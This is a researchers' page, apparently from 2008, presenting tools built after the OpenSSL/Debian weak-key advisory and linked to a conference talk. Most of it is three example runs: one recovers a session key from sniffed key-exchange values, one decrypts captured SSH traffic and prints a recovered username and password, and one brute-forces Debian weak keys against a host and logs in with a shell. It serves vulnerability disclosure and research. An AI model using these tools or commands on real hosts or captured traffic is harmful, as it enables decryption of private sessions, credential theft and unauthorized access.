SSH tools related to the OpenSSL/Debian vulnerability

About these tools

We (Raphaël Rigo, Romain Raboin and Julien Tinnes) gave a short talk at SSTIC 08 about some of the tools we and Yoann Guillot wrote after the OpenSSL/Debian advisory to remotely discover vulnerable keys in authorized_keys files, decipher SSH traffic and retrieve DSA private keys (even from non weak keys). We also wrote an article in french in this MISC issue.

For now we have disclosed the following tools (we might add other tools soon):

Example 1 (ssh_kex_keygen)

./keygen -g $MYGROUP -k $MYSNIFFED_GA -b 256 -s -p 0-32767 -n 4 KEY : 00301439070BCC051E15569D2F7F9BD0ABBD3AA8755AC939B53EED39D266251C3377435 PID : 30149

Example 2 (ssh_decoder)

$ tcpick -wRC -wRS -r pcapssh_putty.cap Starting tcpick 0.2.1 at 2008-07-09 17:37 CEST Timeout for connections is 600 tcpick: reading from pcapssh_putty.cap 1 SYN-SENT 172.24.94.237:52363 > 172.24.83.255:ssh 1 SYN-RECEIVED 172.24.94.237:52363 > 172.24.83.255:ssh 1 ESTABLISHED 172.24.94.237:52363 > 172.24.83.255:ssh 1 FIN-WAIT-1 172.24.94.237:52363 > 172.24.83.255:ssh 1 TIME-WAIT 172.24.94.237:52363 > 172.24.83.255:ssh 1 CLOSED 172.24.94.237:52363 > 172.24.83.255:ssh tcpick: done reading from pcapssh_putty.cap 69 packets captured 1 tcp sessions detected $ ls tcpick* tcpick_172.24.94.237_172.24.83.255_ssh.clnt.dat tcpick_172.24.94.237_172.24.83.255_ssh.serv.dat $ ruby ssh_decoder.rb tcpick* * read handshake cipher: aes256-ctr, mac: hmac-sha1, kex_hash: sha1, compr: none * bruteforce DH DH shared secret : 00c81a4d4fe19a522a972bb9ede9d5901.....(cut) * derive keys * decipher streams * successful authentication packet {:username=>"toto", :nextservice=>"ssh-connection", :auth_method=>"password", :change=>0, :password=>"toto"} * deciphered streams saved to "sshdecrypt.0.client.dat" & "sshdecrypt.0.server.dat"

Example 3 (bfssh)

$ ./bfssh -h ssllol -u toto -p22 -d6 -t rsa -s 2048 -a x86 == BFSSH a strong debian weak key bruteforcer == MaxAuthTries: 6 STATUS: thread: 5 test key: 05790 ... 05795 Authentication success: ./key-x86/rsa2048/id_rsa.05784.pub $ ssh -i ./key-x86/rsa2048/id_rsa.05784 toto@ssllol [snip] $ id uid=1000(toto) gid=1000(toto) groups=4(adm),109(admin),1000(toto)